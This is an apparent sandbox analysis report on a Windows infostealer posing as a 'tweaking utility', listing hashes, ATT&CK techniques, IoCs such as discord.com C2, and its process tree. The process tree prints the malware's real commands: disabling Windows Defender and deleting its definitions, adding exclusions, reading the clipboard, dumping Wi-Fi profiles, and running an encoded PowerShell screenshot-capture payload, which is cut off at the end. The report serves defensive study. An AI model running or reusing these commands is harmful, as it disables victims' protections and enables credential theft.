fc4dd1f0bc745d3960e6664d594cc7f2063bc41e9c5174b897d07af9543a408d

Analysis

max time kernel
148s
max time network
150s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
29-10-2024 08:04

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

EXMPremiumTweakingUtility.exe
Size

6.2MB
MD5

2cfd340ad8e3db06594d0c0ed61cce3f
SHA1

abaec08a14a2a8057415efd7ff02fa68b2ab70ab
SHA256

d974516318fb9c3efd8c30de1041853f5e3ff1f0d211c1adba78f1ba789db1ad
SHA512

078359286a9c07a2751529f7322844ad4dd0bafcb07b6e185c44cd7088c1b6cb80e2e996d70d792f3082374289921ee94460a63881098c5dcfefc2c2c08c4610
SSDEEP

196608:fjBnxDOYjJlpZstQoS9Hf12VKX5brCxVN:LNxBpGt7G/MabuN

Score

8^/10

collection credential_access defense_evasion discovery execution persistence privilege_escalation spyware stealer upx

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
3332	powershell.exe
1248	powershell.exe
1764	powershell.exe
1496	powershell.exe
1696	powershell.exe

Clipboard Data 1 TTPs 2 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
4184	cmd.exe
3676	powershell.exe

Executes dropped EXE 2 IoCs

pid	Process
708	bound.exe
2024	rar.exe

Loads dropped DLL 17 IoCs

pid	Process
736	EXMPremiumTweakingUtility.exe
736	EXMPremiumTweakingUtility.exe
736	EXMPremiumTweakingUtility.exe
736	EXMPremiumTweakingUtility.exe
736	EXMPremiumTweakingUtility.exe
736	EXMPremiumTweakingUtility.exe
736	EXMPremiumTweakingUtility.exe
736	EXMPremiumTweakingUtility.exe
736	EXMPremiumTweakingUtility.exe
736	EXMPremiumTweakingUtility.exe
736	EXMPremiumTweakingUtility.exe
736	EXMPremiumTweakingUtility.exe
736	EXMPremiumTweakingUtility.exe
736	EXMPremiumTweakingUtility.exe
736	EXMPremiumTweakingUtility.exe
736	EXMPremiumTweakingUtility.exe
736	EXMPremiumTweakingUtility.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
28	discord.com
29	discord.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
26	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Enumerates processes with tasklist 1 TTPs 3 IoCs

discovery

Process Discovery

T1057

pid	Process
4344	tasklist.exe
3776	tasklist.exe
2744	tasklist.exe

UPX packed file 59 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral4/files/0x0007000000023d4f-22.dat	upx
behavioral4/memory/736-26-0x00007FFCFCEB0000-0x00007FFCFD315000-memory.dmp	upx
behavioral4/files/0x0007000000023d41-28.dat	upx
behavioral4/memory/736-31-0x00007FFD0CD70000-0x00007FFD0CD94000-memory.dmp	upx
behavioral4/files/0x0007000000023d4d-30.dat	upx
behavioral4/files/0x0007000000023d4e-36.dat	upx
behavioral4/files/0x0007000000023d48-49.dat	upx
behavioral4/memory/736-50-0x00007FFD10520000-0x00007FFD1052F000-memory.dmp	upx
behavioral4/files/0x0007000000023d47-48.dat	upx
behavioral4/files/0x0007000000023d46-47.dat	upx
behavioral4/files/0x0007000000023d45-46.dat	upx
behavioral4/files/0x0007000000023d44-45.dat	upx
behavioral4/files/0x0007000000023d43-44.dat	upx
behavioral4/files/0x0007000000023d42-43.dat	upx
behavioral4/files/0x0007000000023d40-42.dat	upx
behavioral4/files/0x0007000000023d54-41.dat	upx
behavioral4/files/0x0007000000023d53-40.dat	upx
behavioral4/files/0x0007000000023d52-39.dat	upx
behavioral4/files/0x0007000000023d4c-35.dat	upx
behavioral4/memory/736-56-0x00007FFD0CC70000-0x00007FFD0CC9C000-memory.dmp	upx
behavioral4/memory/736-58-0x00007FFD11EA0000-0x00007FFD11EB8000-memory.dmp	upx
behavioral4/memory/736-60-0x00007FFD0CC50000-0x00007FFD0CC6E000-memory.dmp	upx
behavioral4/memory/736-62-0x00007FFCFD400000-0x00007FFCFD571000-memory.dmp	upx
behavioral4/memory/736-66-0x00007FFD0E6D0000-0x00007FFD0E6DD000-memory.dmp	upx
behavioral4/memory/736-65-0x00007FFD0CC30000-0x00007FFD0CC49000-memory.dmp	upx
behavioral4/memory/736-72-0x00007FFD0CC00000-0x00007FFD0CC2E000-memory.dmp	upx
behavioral4/memory/736-75-0x00007FFCFD340000-0x00007FFCFD3F7000-memory.dmp	upx
behavioral4/memory/736-73-0x00007FFCFC610000-0x00007FFCFC987000-memory.dmp	upx
behavioral4/memory/736-71-0x00007FFCFCEB0000-0x00007FFCFD315000-memory.dmp	upx
behavioral4/memory/736-78-0x00007FFD0CAD0000-0x00007FFD0CAE5000-memory.dmp	upx
behavioral4/memory/736-80-0x00007FFD0CE50000-0x00007FFD0CE5D000-memory.dmp	upx
behavioral4/memory/736-77-0x00007FFD0CD70000-0x00007FFD0CD94000-memory.dmp	upx
behavioral4/memory/736-84-0x00007FFCFCCE0000-0x00007FFCFCDF8000-memory.dmp	upx
behavioral4/memory/736-83-0x00007FFD0CC70000-0x00007FFD0CC9C000-memory.dmp	upx
behavioral4/memory/736-186-0x00007FFD0CC50000-0x00007FFD0CC6E000-memory.dmp	upx
behavioral4/memory/736-213-0x00007FFCFD400000-0x00007FFCFD571000-memory.dmp	upx
behavioral4/memory/736-275-0x00007FFD0CC30000-0x00007FFD0CC49000-memory.dmp	upx
behavioral4/memory/736-291-0x00007FFD0CC00000-0x00007FFD0CC2E000-memory.dmp	upx
behavioral4/memory/736-292-0x00007FFCFC610000-0x00007FFCFC987000-memory.dmp	upx
behavioral4/memory/736-304-0x00007FFCFD340000-0x00007FFCFD3F7000-memory.dmp	upx
behavioral4/memory/736-321-0x00007FFD0CC50000-0x00007FFD0CC6E000-memory.dmp	upx
behavioral4/memory/736-317-0x00007FFD0CD70000-0x00007FFD0CD94000-memory.dmp	upx
behavioral4/memory/736-322-0x00007FFCFD400000-0x00007FFCFD571000-memory.dmp	upx
behavioral4/memory/736-316-0x00007FFCFCEB0000-0x00007FFCFD315000-memory.dmp	upx
behavioral4/memory/736-331-0x00007FFCFCEB0000-0x00007FFCFD315000-memory.dmp	upx
behavioral4/memory/736-358-0x00007FFD0CE50000-0x00007FFD0CE5D000-memory.dmp	upx
behavioral4/memory/736-357-0x00007FFD0CAD0000-0x00007FFD0CAE5000-memory.dmp	upx
behavioral4/memory/736-356-0x00007FFCFC610000-0x00007FFCFC987000-memory.dmp	upx
behavioral4/memory/736-355-0x00007FFD0CC00000-0x00007FFD0CC2E000-memory.dmp	upx
behavioral4/memory/736-354-0x00007FFCFD340000-0x00007FFCFD3F7000-memory.dmp	upx
behavioral4/memory/736-353-0x00007FFD0CC30000-0x00007FFD0CC49000-memory.dmp	upx
behavioral4/memory/736-352-0x00007FFCFD400000-0x00007FFCFD571000-memory.dmp	upx
behavioral4/memory/736-351-0x00007FFD0CC50000-0x00007FFD0CC6E000-memory.dmp	upx
behavioral4/memory/736-350-0x00007FFD11EA0000-0x00007FFD11EB8000-memory.dmp	upx
behavioral4/memory/736-349-0x00007FFD0CC70000-0x00007FFD0CC9C000-memory.dmp	upx
behavioral4/memory/736-348-0x00007FFD10520000-0x00007FFD1052F000-memory.dmp	upx
behavioral4/memory/736-347-0x00007FFD0CD70000-0x00007FFD0CD94000-memory.dmp	upx
behavioral4/memory/736-346-0x00007FFD0E6D0000-0x00007FFD0E6DD000-memory.dmp	upx
behavioral4/memory/736-345-0x00007FFCFCCE0000-0x00007FFCFCDF8000-memory.dmp	upx

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
1564	netsh.exe
4948	cmd.exe

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
1308	WMIC.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
5016	systeminfo.exe

Suspicious behavior: EnumeratesProcesses 27 IoCs

pid	Process
3332	powershell.exe
1496	powershell.exe
1496	powershell.exe
1696	powershell.exe
1696	powershell.exe
1696	powershell.exe
3332	powershell.exe
3332	powershell.exe
1460	powershell.exe
1460	powershell.exe
1496	powershell.exe
1496	powershell.exe
1460	powershell.exe
3676	powershell.exe
3676	powershell.exe
3676	powershell.exe
1248	powershell.exe
1248	powershell.exe
3788	powershell.exe
3788	powershell.exe
3788	powershell.exe
1764	powershell.exe
1764	powershell.exe
1764	powershell.exe
976	powershell.exe
976	powershell.exe
976	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	3332	powershell.exe
Token: SeDebugPrivilege	4344	tasklist.exe
Token: SeDebugPrivilege	3776	tasklist.exe
Token: SeDebugPrivilege	1496	powershell.exe
Token: SeDebugPrivilege	1696	powershell.exe
Token: SeIncreaseQuotaPrivilege	4444	WMIC.exe
Token: SeSecurityPrivilege	4444	WMIC.exe
Token: SeTakeOwnershipPrivilege	4444	WMIC.exe
Token: SeLoadDriverPrivilege	4444	WMIC.exe
Token: SeSystemProfilePrivilege	4444	WMIC.exe
Token: SeSystemtimePrivilege	4444	WMIC.exe
Token: SeProfSingleProcessPrivilege	4444	WMIC.exe
Token: SeIncBasePriorityPrivilege	4444	WMIC.exe
Token: SeCreatePagefilePrivilege	4444	WMIC.exe
Token: SeBackupPrivilege	4444	WMIC.exe
Token: SeRestorePrivilege	4444	WMIC.exe
Token: SeShutdownPrivilege	4444	WMIC.exe
Token: SeDebugPrivilege	4444	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4444	WMIC.exe
Token: SeRemoteShutdownPrivilege	4444	WMIC.exe
Token: SeUndockPrivilege	4444	WMIC.exe
Token: SeManageVolumePrivilege	4444	WMIC.exe
Token: 33	4444	WMIC.exe
Token: 34	4444	WMIC.exe
Token: 35	4444	WMIC.exe
Token: 36	4444	WMIC.exe
Token: SeDebugPrivilege	2744	tasklist.exe
Token: SeIncreaseQuotaPrivilege	4444	WMIC.exe
Token: SeSecurityPrivilege	4444	WMIC.exe
Token: SeTakeOwnershipPrivilege	4444	WMIC.exe
Token: SeLoadDriverPrivilege	4444	WMIC.exe
Token: SeSystemProfilePrivilege	4444	WMIC.exe
Token: SeSystemtimePrivilege	4444	WMIC.exe
Token: SeProfSingleProcessPrivilege	4444	WMIC.exe
Token: SeIncBasePriorityPrivilege	4444	WMIC.exe
Token: SeCreatePagefilePrivilege	4444	WMIC.exe
Token: SeBackupPrivilege	4444	WMIC.exe
Token: SeRestorePrivilege	4444	WMIC.exe
Token: SeShutdownPrivilege	4444	WMIC.exe
Token: SeDebugPrivilege	4444	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4444	WMIC.exe
Token: SeRemoteShutdownPrivilege	4444	WMIC.exe
Token: SeUndockPrivilege	4444	WMIC.exe
Token: SeManageVolumePrivilege	4444	WMIC.exe
Token: 33	4444	WMIC.exe
Token: 34	4444	WMIC.exe
Token: 35	4444	WMIC.exe
Token: 36	4444	WMIC.exe
Token: SeDebugPrivilege	1460	powershell.exe
Token: SeDebugPrivilege	3676	powershell.exe
Token: SeDebugPrivilege	1248	powershell.exe
Token: SeDebugPrivilege	3788	powershell.exe
Token: SeIncreaseQuotaPrivilege	3300	WMIC.exe
Token: SeSecurityPrivilege	3300	WMIC.exe
Token: SeTakeOwnershipPrivilege	3300	WMIC.exe
Token: SeLoadDriverPrivilege	3300	WMIC.exe
Token: SeSystemProfilePrivilege	3300	WMIC.exe
Token: SeSystemtimePrivilege	3300	WMIC.exe
Token: SeProfSingleProcessPrivilege	3300	WMIC.exe
Token: SeIncBasePriorityPrivilege	3300	WMIC.exe
Token: SeCreatePagefilePrivilege	3300	WMIC.exe
Token: SeBackupPrivilege	3300	WMIC.exe
Token: SeRestorePrivilege	3300	WMIC.exe
Token: SeShutdownPrivilege	3300	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3228 wrote to memory of 736	3228	EXMPremiumTweakingUtility.exe	84
PID 3228 wrote to memory of 736	3228	EXMPremiumTweakingUtility.exe	84
PID 736 wrote to memory of 2052	736	EXMPremiumTweakingUtility.exe	87
PID 736 wrote to memory of 2052	736	EXMPremiumTweakingUtility.exe	87
PID 736 wrote to memory of 3772	736	EXMPremiumTweakingUtility.exe	88
PID 736 wrote to memory of 3772	736	EXMPremiumTweakingUtility.exe	88
PID 736 wrote to memory of 4672	736	EXMPremiumTweakingUtility.exe	90
PID 736 wrote to memory of 4672	736	EXMPremiumTweakingUtility.exe	90
PID 736 wrote to memory of 3736	736	EXMPremiumTweakingUtility.exe	91
PID 736 wrote to memory of 3736	736	EXMPremiumTweakingUtility.exe	91
PID 736 wrote to memory of 4936	736	EXMPremiumTweakingUtility.exe	95
PID 736 wrote to memory of 4936	736	EXMPremiumTweakingUtility.exe	95
PID 2052 wrote to memory of 1496	2052	cmd.exe	96
PID 2052 wrote to memory of 1496	2052	cmd.exe	96
PID 736 wrote to memory of 2932	736	EXMPremiumTweakingUtility.exe	98
PID 736 wrote to memory of 2932	736	EXMPremiumTweakingUtility.exe	98
PID 3772 wrote to memory of 3332	3772	cmd.exe	97
PID 3772 wrote to memory of 3332	3772	cmd.exe	97
PID 4936 wrote to memory of 4344	4936	cmd.exe	101
PID 4936 wrote to memory of 4344	4936	cmd.exe	101
PID 2932 wrote to memory of 3776	2932	cmd.exe	102
PID 2932 wrote to memory of 3776	2932	cmd.exe	102
PID 736 wrote to memory of 2780	736	EXMPremiumTweakingUtility.exe	103
PID 736 wrote to memory of 2780	736	EXMPremiumTweakingUtility.exe	103
PID 3736 wrote to memory of 708	3736	cmd.exe	104
PID 3736 wrote to memory of 708	3736	cmd.exe	104
PID 4672 wrote to memory of 1696	4672	cmd.exe	106
PID 4672 wrote to memory of 1696	4672	cmd.exe	106
PID 736 wrote to memory of 4184	736	EXMPremiumTweakingUtility.exe	107
PID 736 wrote to memory of 4184	736	EXMPremiumTweakingUtility.exe	107
PID 736 wrote to memory of 4320	736	EXMPremiumTweakingUtility.exe	109
PID 736 wrote to memory of 4320	736	EXMPremiumTweakingUtility.exe	109
PID 736 wrote to memory of 1756	736	EXMPremiumTweakingUtility.exe	111
PID 736 wrote to memory of 1756	736	EXMPremiumTweakingUtility.exe	111
PID 736 wrote to memory of 4948	736	EXMPremiumTweakingUtility.exe	112
PID 736 wrote to memory of 4948	736	EXMPremiumTweakingUtility.exe	112
PID 736 wrote to memory of 1136	736	EXMPremiumTweakingUtility.exe	114
PID 736 wrote to memory of 1136	736	EXMPremiumTweakingUtility.exe	114
PID 736 wrote to memory of 4812	736	EXMPremiumTweakingUtility.exe	116
PID 736 wrote to memory of 4812	736	EXMPremiumTweakingUtility.exe	116
PID 2780 wrote to memory of 4444	2780	cmd.exe	120
PID 2780 wrote to memory of 4444	2780	cmd.exe	120
PID 4320 wrote to memory of 2744	4320	cmd.exe	121
PID 4320 wrote to memory of 2744	4320	cmd.exe	121
PID 1756 wrote to memory of 712	1756	cmd.exe	132
PID 1756 wrote to memory of 712	1756	cmd.exe	132
PID 4948 wrote to memory of 1564	4948	cmd.exe	123
PID 4948 wrote to memory of 1564	4948	cmd.exe	123
PID 4184 wrote to memory of 3676	4184	cmd.exe	124
PID 4184 wrote to memory of 3676	4184	cmd.exe	124
PID 1136 wrote to memory of 5016	1136	cmd.exe	125
PID 1136 wrote to memory of 5016	1136	cmd.exe	125
PID 4812 wrote to memory of 1460	4812	cmd.exe	126
PID 4812 wrote to memory of 1460	4812	cmd.exe	126
PID 736 wrote to memory of 2356	736	EXMPremiumTweakingUtility.exe	127
PID 736 wrote to memory of 2356	736	EXMPremiumTweakingUtility.exe	127
PID 2356 wrote to memory of 4856	2356	cmd.exe	129
PID 2356 wrote to memory of 4856	2356	cmd.exe	129
PID 1460 wrote to memory of 4432	1460	powershell.exe	130
PID 1460 wrote to memory of 4432	1460	powershell.exe	130
PID 736 wrote to memory of 4988	736	EXMPremiumTweakingUtility.exe	131
PID 736 wrote to memory of 4988	736	EXMPremiumTweakingUtility.exe	131
PID 4432 wrote to memory of 972	4432	csc.exe	133
PID 4432 wrote to memory of 972	4432	csc.exe	133

C:\Users\Admin\AppData\Local\Temp\EXMPremiumTweakingUtility.exe
"C:\Users\Admin\AppData\Local\Temp\EXMPremiumTweakingUtility.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:3228
- C:\Users\Admin\AppData\Local\Temp\EXMPremiumTweakingUtility.exe
  "C:\Users\Admin\AppData\Local\Temp\EXMPremiumTweakingUtility.exe"
  2⤵
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:736
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\EXMPremiumTweakingUtility.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2052
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\EXMPremiumTweakingUtility.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1496
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3772
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3332
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4672
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1696
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "start bound.exe"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3736
  - - C:\Users\Admin\AppData\Local\Temp\bound.exe
      bound.exe
      4⤵
      Executes dropped EXE
      PID:708
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4936
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:4344
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2932
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:3776
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2780
  - - C:\Windows\System32\Wbem\WMIC.exe
      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:4444
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    - Suspicious use of WriteProcessMemory
    PID:4184
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Clipboard Data
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3676
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4320
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:2744
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1756
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:712
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
    3⤵
    - System Network Configuration Discovery: Wi-Fi Discovery
    - Suspicious use of WriteProcessMemory
    PID:4948
  - - C:\Windows\system32\netsh.exe
      netsh wlan show profile
      4⤵
      Event Triggered Execution: Netsh Helper DLL
      System Network Configuration Discovery: Wi-Fi Discovery
      PID:1564
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "systeminfo"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1136
  - - C:\Windows\system32\systeminfo.exe
      systeminfo
      4⤵
      Gathers system information
      PID:5016
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8A